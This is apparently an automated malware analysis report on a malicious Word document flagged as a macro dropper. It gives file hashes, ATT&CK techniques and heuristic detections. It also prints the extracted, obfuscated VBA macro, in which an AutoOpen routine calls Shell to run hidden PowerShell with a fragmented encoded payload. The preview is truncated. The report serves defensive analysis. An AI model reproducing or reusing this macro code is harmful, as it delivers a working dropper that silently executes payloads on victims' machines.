Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1e12bea93b18add3…

MALICIOUS

Office (OLE)

Size: 109.8 KB
Created: 2018-05-24 08:03:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: 1c38b73658b558f22ea41e461668a1bd
SHA-1: 3f73558f0fc4fa5de2f542e6497b237846e56e3b
SHA-256: 1e12bea93b18add3994030cffe4913cce588d9b76fe1a66a84948586dd89ca7e
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample contains a VBA macro with an AutoOpen function that calls the Shell() function. This function is used to execute a PowerShell command, which is obfuscated but appears to be designed to download and execute a second-stage payload. The ClamAV detection name 'Doc.Dropper.Agent-6555972-0' further supports the dropper functionality.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6555972-0 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6555972-0
  • VBA macros detected (severity: medium; 3 related findings; rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (severity: critical; rule: OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro (severity: high; rule: OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens (severity: high; rule: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (severity: medium; rule: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (severity: info; rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 12240 bytes
SHA-256: f2e847a48855fb3aed41a9c7c730ae5d65673aaba7a0efb713eab5c2fc429e72
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "crqDliEDdIju"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function HqjLdTSsw()
On Error Resume Next
bYRwED = zjOsv - Cos(fGQrzl) * 1 - Chr(82230) / 54869 - ChrB(XjDrm)
sOKkj = 6960
KVzcQC = JuWij - Cos(MoSjI) * 1 - Chr(27530) / 9446 - ChrB(BlsMQ)
EUEHOn = 89698
HqjLdTSsw = jsYzRs + ufzqmcp + YcEwqIETM + EGrRaGOmDuU + tufCOmjX + VlkQcr + NpFHTlA + hasHvBHc + UAuuLlM
utVUoZ = dJZLZ - Cos(EwdcS) * 1 - Chr(97514) / 46783 - ChrB(kFQzN)
pqOPsS = 32039
End Function
Sub Autoopen()
On Error Resume Next
YLnafG = bTArf - Cos(Xafwp) * 1 - Chr(42921) / 73061 - ChrB(oEVaa)
mvJTG = 85574
fsHjVuKwT (HqjLdTSsw)
XRosT = lImPI - Cos(zRPjTD) * 1 - Chr(93223) / 58977 - ChrB(kHSzEp)
jJhknq = 913
End Sub
Function fsHjVuKwT(dKlMhN)
On Error Resume Next
qDWEA = CpNrc - Cos(XLpPKN) * 1 - Chr(50195) / 74895 - ChrB(WsOcA)
chXvHR = 11686
Phsiji = EHbrO - Cos(TSaZQ) * 1 - Chr(26018) / 98168 - ChrB(LHczY)
HqwVh = 32585
dDRXvTsZ = Shell(jMHisH + Chr(vbKeyP) + mLPhVUtjaVL + dKlMhN, vbHide)
aiRjq = sRkmk - Cos(IJPwWq) * 1 - Chr(7274) / 13518 - ChrB(EZPiL)
KOLGK = 94851
End Function


Attribute VB_Name = "tjJpZIG"
Function jsYzRs()
On Error Resume Next
jsARM = cAFzj - Cos(zsvKhS) * 1 - Chr(4822) / 17088 - ChrB(AvFii)
HcFWLa = 48226
QzCjriXUntD = "owersHeLL" + " -WinDowsTyle h" + "idden -e I" + "ABJAEUAeAAg" + "ACgAIAAoA" + "CgAKAAiAHsAMwA3" + "AH0AewAzADAAfQ" + "B7ADEAMQB9A" + "HsANAA2" + "AH0Aew"
tJENn = AQsjf - Cos(kArQo) * 1 - Chr(51398) / 83334 - ChrB(fzvji)
VXzbYA = 51042
BvjcvULDPMD = "AzAH0AewA4AD" + "YAfQB7ADI" + "AOAB9A" + "HsAMQAyAH0Aew" + "A4ADQAfQB7ADYAM" + "gB9AHsANAA1A"
CBdEOD = jDWCO - Cos(Glohl) * 1 - Chr(67714) / 41173 - ChrB(vOUfGk)
RRLfpA = 96781
kJFpR = "H0AewAzAD" + "UAfQB7ADYAOQ" + "B9AHsANgAxAH0" + "AewA3ADUA" + "fQB7ADUAMgB9AHs" + "ANwA5AH0A" + "ewA4ADAAfQB"
nkLowv = YjTcOm - Cos(tmRFI) * 1 - Chr(12039) / 75253 - ChrB(YITcS)
LXZEIu = 2302
QjmJr = "7ADUANAB9AHsAN" + "QAzAH0AewA" + "xADAAf" + "QB7ADEAM" + "wB9AHsAMQA" + "3AH0AewA3AD" + "cAfQB7ADYAOAB9" + "AHsAOAAyAH0AewA" + "2ADAAfQB7ADg" + "AOAB9"
ZvWjBp = MdVpFX - Cos(OkrsD) * 1 - Chr(58954) / 23200 - ChrB(UWcHN)
tYGsJ = 94273
FPkbwVMoAhi = "AHsAMAB9AHsANA" + "AyAH0AewA0A" + "DEAfQB7" + "ADEAOQB" + "9AHsAOQB9AHs" + "AOAB9AHsAOAA"
VicEz = MfzmM - Cos(mJpMQ) * 1 - Chr(82775) / 43348 - ChrB(WaADub)
SFPzva = 21059
cSfWjioODP = "zAH0AewAxAD" + "QAfQB7ADEANQ" + "B9AHsAMgA" + "2AH0A" + "ewAyADUAf"
jsYzRs = QzCjriXUntD + BvjcvULDPMD + kJFpR + QjmJr + FPkbwVMoAhi + cSfWjioODP
End Function
Function ufzqmcp()
On Error Resume Next
CPnFKz = XjPsa - Cos(ELpBnM) * 1 - Chr(82509) / 91499 - ChrB(YKWota)
oQobQn = 94635
obCPwQpjJU = "QB7ADIA" + "MAB9AHsANwB9A" + "HsAOAAx" + "AH0AewA1ADYA" + "fQB7AD" + "IAMQB9A"
lMkwDR = BAfNtZ - Cos(INUwUq) * 1 - Chr(56867) / 68438 - ChrB(Gzpuz)
wjROM = 30587
TdVmw = "HsANwAy" + "AH0AewAx" + "ADYAfQB7ADMA" + "OAB9AHs" + "AMgA0AH0" + "AewAx" + "ADgAfQB7"
bssQlI = JfjIs - Cos(aHUSG) * 1 - Chr(98282) / 3433 - ChrB(iBNWoz)
wwiMj = 63781
VMDqPw = "ADQAMAB9AHsA" + "NAAzA" + "H0AewA2A" + "DUAfQB7ADQA" + "OAB9AHsAM"
cEEFUO = aQjCq - Cos(rPwHNO) * 1 - Chr(70340) / 92792 - ChrB(itwLTM)
CvLbof = 30337
lOjoiETUhYY = "gA5AH0AewA2ADMA" + "fQB7ADQAf" + "QB7ADc" + "AMQB9AHsANgA2AH" + "0AewAzAD"
BiniE = jUzTKh - Cos(WzSwql) * 1 - Chr(49028) / 21569 - ChrB(IvzqO)
qPpLzk = 13206
UFqWIHDcKPc = "QAfQB7AD" + "IAMwB9A" + "HsANAA0AH0Ae" + "wA0ADcAfQ" + "B7ADUAfQB7ADE" + "AfQB7ADIAfQB7AD"
aFrFzZ = rIflfw - Cos(izuqCs) * 1 - Chr(41456) / 85049 - ChrB(OXvdii)
iMPPrq = 98391
ZhRbfQiKpRp = "UANwB9" + "AHsANQA4AH0Ae" + "wA4ADUAfQB7" + "ADUAMQB9" + "AHsANwA" + "wAH0AewA3ADM"
blJRmT = ipwkr - Cos(IiONi) * 1 - Chr(50319) / 55574 - ChrB(CvQMIz)
PjCnw = 26045
RjSrPRj = "AfQB7ADcAOAB9" + "AHsANgB9AHsAMwA" + "5AH0AewA4ADc" + "AfQB7ADU" + "ANQB9AHsA" + "NAA5AH0AewA2" + "ADQAfQB7ADI"
ufzqmcp = obCPwQpjJU + Td
... (truncated)